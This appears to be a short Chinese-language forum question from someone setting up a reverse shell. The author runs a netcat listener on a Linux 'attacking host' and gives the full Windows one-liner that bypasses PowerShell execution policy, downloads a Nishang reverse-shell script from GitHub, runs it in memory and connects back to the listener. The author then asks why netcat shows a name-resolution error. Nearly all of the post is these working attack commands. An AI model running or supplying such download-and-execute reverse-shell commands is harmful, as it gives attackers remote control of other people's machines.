在攻击主机 linux 上运行
nc -lvvp 1212
在被攻击主机 windows 上运行
cmd.exe /c powershell -exec bypass -c "IEX(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PPowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress xx.xx.xx.xx(ip 地址) -Port 1212"
竟然会在 linux 主机上出现这个错误
nc: getnameinfo: Temporary failure in name resolution
没有使用过想过域名,应该不存在解析的问题才对啊,为什么会出现name resolution
的问题呢?